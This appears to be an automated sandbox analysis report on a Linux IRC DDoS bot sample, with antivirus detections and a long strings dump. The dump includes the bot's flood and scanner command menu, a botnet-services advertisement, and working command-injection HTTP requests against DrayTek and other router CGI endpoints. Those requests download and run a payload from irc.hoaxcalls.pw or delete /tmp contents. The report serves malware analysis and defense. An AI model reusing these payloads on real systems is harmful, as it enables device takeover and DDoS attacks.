Analysis

Category Package Started Completed Duration Log
FILE 2020-04-14 00:10:08 2020-04-14 00:11:37 89 seconds Show Log
2020-04-04 06:39:49,028 [root] ERROR: Traceback (most recent call last):
  File "C:/tmpp11a79hs/analyzer.py", line 1534, in <module>
    analyzer.prepare()
  File "C:/tmpp11a79hs/analyzer.py", line 234, in prepare
    self.options = self.config.get_options()
  File "C:\tmpp11a79hs\lib\core\config.py", line 46, in get_options
    key, value = field.split("=", 1)
ValueError: not enough values to unpack (expected 2, got 1)
Traceback (most recent call last):
  File "C:/tmpp11a79hs/analyzer.py", line 1534, in <module>
    analyzer.prepare()
  File "C:/tmpp11a79hs/analyzer.py", line 234, in prepare
    self.options = self.config.get_options()
  File "C:\tmpp11a79hs\lib\core\config.py", line 46, in get_options
    key, value = field.split("=", 1)
ValueError: not enough values to unpack (expected 2, got 1)
2020-04-04 06:39:49,028 [root] WARNING: Folder at path "C:\uguFtTQkN\debugger" does not exist, skip.
2020-04-04 06:39:49,028 [root] ERROR: Analyzer object has no attribute 'command_pipe'

Machine

Name Label Manager Started On Shutdown On
win7_2 win7_2 KVM 2020-04-14 00:10:08 2020-04-14 00:11:37

File Details

File Name file
File Size 102628 bytes
File Type ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
MD5 7040a2ce4e8e07ec854723c4006a0a02
SHA1 f97c0b21d09f3e1ec5f78ad70b1627eea271694f
SHA256 f21a9dc8f9c16a942e9c18729813bd3fb9f6e1408df68731160d7fe506f29bc6
SHA512 5ac40121639270da99f4a1adec1a961cc78b5744bbbd5d3c04bb35c9ee7c5d6054bc9a1f650df4da5cbb8c08b6c6ad6dab01acb59688f8faf8a59707815cb1c8
CRC32 CC83B859
Ssdeep 3072:MCqIK8/msNAjjrZvV2Al4YXqSqx0ZeqxgUCz:MwK8usSzHB4YXqSqx0ZeqxgUCz
Yara
  • shellcode_get_eip - Match x86 that appears to fetch $PC. - Author: William Ballenthin
Download Download ZIP Resubmit sample

Signatures

File has been identified by 37 Antiviruses on VirusTotal as malicious
DrWeb: Linux.BackDoor.Tsunami.1211
MicroWorld-eScan: Gen:Variant.Backdoor.Linux.Tsunami.1
ALYac: Backdoor.Linux.Tsunami
Sangfor: Malware
BitDefenderTheta: Gen:NN.Mirai.34106
Cyren: ELF/Backdoor.BQWR-
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of Linux/IRCBot.P
TrendMicro-HouseCall: Backdoor.Linux.BASHLITE.SMJC11
Avast: ELF:Gafgyt-KR [Trj]
Kaspersky: HEUR:Backdoor.Linux.Tsunami.ci
BitDefender: Gen:Variant.Backdoor.Linux.Tsunami.1
AegisLab: Trojan.Linux.Tsunami.m!c
Tencent: Trojan.Linux.Tsunami.bp
Ad-Aware: Gen:Variant.Backdoor.Linux.Tsunami.1
Sophos: Mal/Generic-S
Comodo: [email protected]#27zsk2swq5vbs
F-Secure: Malware.LINUX/IRCBot.xqfhe
TrendMicro: Backdoor.Linux.BASHLITE.SMJC11
McAfee-GW-Edition: Linux/HeliBot!7040A2CE4E8E
FireEye: Gen:Variant.Backdoor.Linux.Tsunami.1
Emsisoft: Gen:Variant.Backdoor.Linux.Tsunami.1 (B)
Ikarus: Trojan.Linux.Gafgyt
Antiy-AVL: Trojan[Backdoor]/Linux.Tsunami.ci
Microsoft: Trojan:Win32/Skeeyah.A!rfn
Arcabit: Trojan.Backdoor.Linux.Tsunami.1
ZoneAlarm: HEUR:Backdoor.Linux.Tsunami.ci
Avast-Mobile: ELF:Gafgyt-KS [Trj]
GData: Gen:Variant.Backdoor.Linux.Tsunami.1
AhnLab-V3: Linux/Gafgyt.Gen44
McAfee: Linux/HeliBot!7040A2CE4E8E
MAX: malware (ai score=100)
Rising: Backdoor.Tsunami!8.E80 (TFE:14:Dta0bK8g7TF)
SentinelOne: DFI - Malicious ELF
Fortinet: ELF/Gafgyt.BJ!tr
AVG: ELF:Gafgyt-KR [Trj]
Qihoo-360: Linux/Backdoor.c7a

Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
PRh k
PRh k
PRh k
PRQhxt
hostf
pidf
/prof
^8PSh
D$$PV
\[^_]
^8RSh
^8QSh
ZY[^_]
\$HPh
D$$Ph
t$xSU
D$TPh(
E$VRWP
L[^_]
D$ Pj
D$ Pj
\$Thp
2#D$
\$0PPj
;X,tQ
SSPQ)
D$,Ph
}/C;T$
t$$h`
u%WWSS
PPSh
D$<PR
^8WSh
<wt7f
E4tmPhT
whQWUR
D$(RP
D$'f)
|$'fto
^8PSh
^8PSh
'RRWS
Z[^_]
D$<XZj
D$LPU
K9\$$}
;\$d|
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
K9\$$}
t>QQhY
^8PSh
D$(PV
D$(PV
D$ PU
yQQVht
,[^_]
+<0u$
D<,.f
<[^_]
;D$|v
YRRj.W
G;|$,s\PS
gethostbyname
NOTICE %s :unable to comply
PRIVMSG %s :unable to resolve %s
8.8.8.8
/proc/net/route
00000000
(null)
%s : USERID : UNIX : %s
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
PRIVMSG %s :Usage: !* UDP <host> <port> <time> 32 1024 10
PRIVMSG %s :attack has been started on %s
PRIVMSG %s :Usage: !* HEX <host> <port> <time> 1024
PRIVMSG %s :Usage: !* DNS <host> <port> <time>
PRIVMSG %s :[XTC] # # # # # # # # # # D D O S - C O M M A N D S # # # # # # # # # #
PRIVMSG %s :[XTC] !* UDP <host> <port> <time> 32 <packetsize> 10 - UDP FLOOD
PRIVMSG %s :[XTC] !* HEX <host> <port> <time> <packetsize>
- HEX FLOOD
PRIVMSG %s :[XTC] !* DNS <host> <port> <time> - DNS FLOOD
PRIVMSG %s :[XTC] # # # # # # # # # # O T H E R - C O M M A N D S # # # # # # # # #
PRIVMSG %s :[XTC] !* DRAYTEK <start/<stop> - START DRAYTEK SCANNER
PRIVMSG %s :[XTC] !* UCM <start/<stop> - START UCM SCANNER
PRIVMSG %s :[XTC] !* HELP - COMMAND HELP
PRIVMSG %s :[XTC] !* RULES - BOTNET RULES
PRIVMSG %s :[XTC] !* INFO - ABOUT THE BOT
PRIVMSG %s :[XTC] # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
PRIVMSG %s :[XTC] # # # # # # # # # # B O T N E T - R U L E S # # # # # # # # # # #
PRIVMSG %s :[XTC] 1. do not spam attacks
PRIVMSG %s :[XTC] 2. do not share this irc server
PRIVMSG %s :[XTC] 3. do not attack this irc server
PRIVMSG %s :[XTC] 4. do not start multible scanners per once
PRIVMSG %s :[XTC] 5. do not hit any type of goverments
PRIVMSG %s :[XTC] 6. respect all other customers
PRIVMSG %s :[XTC] 7. respect the botnet administrators
PRIVMSG %s :[XTC] # # # # # # # # # # A B O U T - T H E - B O T # # # # # # # # # #
PRIVMSG %s :[XTC] weapomized ddos malware includes powerfull ddos methods
PRIVMSG %s :[XTC] who bypass the most firewalls. advanched bot killer to destroy
PRIVMSG %s :[XTC] all most common mirai, qbot, kaiten bot proccesses
PRIVMSG %s :[XTC] fast selfreplication on every infected bot without raw socket.
PRIVMSG %s :[XTC] developed and completed by viktor sanchez. contact me on
PRIVMSG %s :[XTC] jabber under [email protected] for botnet services.
NOTICE %s :Usage: !* DRAYTEK <start/stop>
start
PRIVMSG %s :draytek scanner started
PRIVMSG %s :draytek scanner stopped
NOTICE %s :Usage: !* UCM <start/stop>
PRIVMSG %s :ucm scanner started
PRIVMSG %s :ucm scanner stopped
DRAYTEK
RULES
POPPINSHELLZ
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s
MODE %s -x
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG
/dev/null
#hellroom
NICK %s
USER %s localhost localhost :%s
ERROR
POST /cgi-bin/mainfunction.cgi HTTP/1.0
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Arm${IFS}-rf${IFS}%2ftmp%2f*%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Arm${IFS}-rf${IFS}%2ftmp%2f*%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.0
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Awget${IFS}http:%2f%2firc.hoaxcalls.pw%2fsh${IFS}-O${IFS}%2ftmp%2fupnp.debug_01;${IFS}chmod${IFS}777${IFS}%2ftmp%2fupnp.debug_01;${IFS}sh${IFS}%2ftmp%2fupnp.debug_01%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Awget${IFS}http:%2f%2firc.hoaxcalls.pw%2fsh${IFS}-O${IFS}%2ftmp%2fupnp.debug_02;${IFS}chmod${IFS}777${IFS}%2ftmp%2fupnp.debug_02;${IFS}sh${IFS}%2ftmp%2fupnp.debug_02%0A%27&loginUser=a&loginPwd=a
POST /cgi HTTP/1.0
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.1
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.0
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://irc.hoaxcalls.pw/arm7${IFS}-O${IFS}/tmp/upnp.debug_01;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_01;${IFS}/tmp/upnp.debug_01`;`
POST /cgi HTTP/1.1
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://irc.hoaxcalls.pw/arm7${IFS}-O${IFS}/tmp/upnp.debug_02;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_02;${IFS}/tmp/upnp.debug_02`;`
bin:
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
+0-#'I
Unknown error
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/dev/null
L(knN
Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.got.plt
.data
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
bot.c
textBuffer.4702
i.4774
i.4866
printchar
prints
printi
print
checksum.c
draytek.c
draytek_get_random_ip
draytek_setup_connection
rand.c
resolv.c
resolv_skip_name
table.c
add_entry
toggle_obf
ucm.c
ucm_get_random_ip
ucm_setup_connection
util.c
util_isspace
util_isdigit
util_isalpha
util_isupper
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
close.c
fork.c
getdtablesize.c
getpid.c
getppid.c
getrlimit.c
ioctl.c
kill.c
open.c
read.c
select.c
time.c
waitpid.c
write.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
clock.c
puts.c
vsprintf.c
sprintf.c
vsnprintf.c
popen.c
mylock
popen_list
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3991
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4201
prefix.4202
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4203
qual_chars.4208
spec_chars.4204
spec_ranges.4205
spec_or_mask.4206
spec_and_mask.4207
feof.c
fgets.c
fgets_unlocked.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memmove.c
memset.c
strcat.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1161
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strdup.c
strtok.c
next_start.1109
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2762
inet_ntoa.c
buf.2658
inet_makeaddr.c
gethostbyname.c
buf.4993
h.4992
gethostbyname_r.c
accept.c
bind.c
connect.c
getsockname.c
getsockopt.c
listen.c
recv.c
recvfrom.c
send.c
sendto.c
setsockopt.c
socket.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
been_there_done_that
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2832
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/vfork.S
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
dup2.c
execve.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getuid.c
mremap.c
munmap.c
nanosleep.c
pipe.c
sbrk.c
sigprocmask.c
times.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fclose.c
fdopen.c
fprintf.c
_WRITE.c
_fopen.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
vfprintf.c
fflush_unlocked.c
fgetc_unlocked.c
memchr.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
sigsetops.c
dl-support.c
brk.c
__syscall_error.c
poll.c
fopen.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
ntop.c
inet_pton4
xdigits.3116
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
strchr.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
__socketcall
__GI___ctype_b
__GI_memchr
junk_flood
dispass
__GI___glibc_strerror_r
waitpid
conn_table
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
popen
sysconf
stdout
vsprintf
random
__GI_getpagesize
__GI_strdup
draytek_scanner_kill
command_hex
getdtablesize
__GI_h_errno
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
putc_unlocked
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
command_rules
__sigdelset
util_stristr
identd
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
draytek_recv_strip_null
memmove
pclose
__GI_strpbrk
sendbacktoHost
table_key2
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
_h_errno
getc_unlocked
times
ident
__ctype_b
__GI_random_r
resolv_domain_to_hostname
errno
getegid
__GI_sbrk
__libc_accept
__GI___uClibc_init
execve
getpagesize
getpid
util_strncmp
localAddr
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
util_fdgets
__xpg_strerror_r
fcntl64
mfork
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
ucm_fake_time
__GI_fgets
creat
rand_init
_stdio_openlist_dec_use
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
table_key5
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
util_strcat
__open_etc_hosts
malloc
isatty
table_unlock_val
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
recvfrom
__C_ctype_tolower
resolvehttp
random_r
__dso_handle
clock_getres
hold_flood
gethostbyname_r
tcpcsum
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_accept
watchdog_pid
__stdio_seek
mempcpy
__GI_strcoll
util_atoi
__GI_write
util_memsearch
__ctype_toupper
__libc_read
_string_syserrmsgs
disabled
__GI_herror
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
__fgetc_unlocked
abort
getspoof
__GI_fcntl
ucm_rsck
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
strtol
draytek_scanner_rawpkt
__libc_lseek64
strnlen
rawmemchr
draytek_rsck_out
__GI_mempcpy
accept
__malloc_state
__GI___C_ctype_b_data
resolv_lookup
ucm_debug_start
table
execfile
__sigaddset
nanosleep
__GI_send
h_errno
calloc
command_udp
server
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
spoofs
environ
__GI_close
fprintf
__resolv_lock
fputs_unlocked
__pthread_mutex_trylock
strcat
__GI_brk
__GI_strcat
__GI_nanosleep
__GI_strtok
LOCAL_ADDR
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
table_key3
__GI_fseek
draytek_debug_kill
ourIP
util_strlen
util_zero
fseeko
_stdio_openlist_del_count
makestring
__raise
setsockopt
spoofsm
ucm_scanner_rawpkt
__GI_times
fseek
mremap
__GI_kill
__GI_strcmp
ucm_recv_strip_null
__GI_memmove
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
draytek_debug_start
__GI_isatty
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
table_retrieve_val
ucm_debug_kill
makeRandomShit
util_local_addr2
wcsrtombs
_stdio_user_locking
filter
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
__GI___C_ctype_b
table_key
realloc
__GI_gethostbyname_r
__GI_strncpy
realrand
_PRIVMSG
__libc_send
__GI___xpg_strerror_r
__GI___C_ctype_tolower
__GI_recvfrom
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
draytek_rsck
listen
_NICK
__stdio_adjust_position
malloc_trim
fdopen
__GI_poll
_vfprintf_internal
rand_next
table_key4
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
__rtld_fini
__GI_fork
__libc_close
strdup
__GI_getpid
inet_aton
util_memcpy
watchdog_maintain
index
_pthread_cleanup_push_defer
__sigismember
fopen
__bss_start
__libc_open
getOurIP
resolv_entries_free
command_help
memset
__GI_socket
__glibc_strerror_r
util_local_addr
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
srand
table_lock_val
ucm_scanner_pid
initstate
fclose
__syscall_rt_sigaction
ntohs
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
__libc_recvfrom
checksum_generic
ucm_scanner_init
__GI_abort
draytek_fake_time
host2ip
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
herror
strcmp
__nameserver
data_start
__GI_sysconf
command_dns
__h_errno_location
__GI_putc_unlocked
__C_ctype_b_data
__GI_inet_pton
fd_serv
gethostbyname
_stdio_fopen
util_itoa
_fini
__vfork
__GI_mmap
sprintf
draytek_scanner_init
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
__GI_waitpid
__GI_vfprintf
_stdio_term
__decode_answer
numservers
stderr
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__libc_fork
command_info
changeservers
__atexit_lock
rand_cmwc
draytek_scanner_pid
util_strcmp
command_draytek
ucm_rsck_out
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
strwildmatch
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
rand__str
_edata
__stdout
udp_flood
filetoexe
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
__GI_listen
htons
util_strcpy
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
__stdio_WRITE
_stdio_init
__GI_geteuid
checksum_tcpudp
inet_ntop
__C_ctype_toupper_data
stringsendtohost
_dl_aux_init
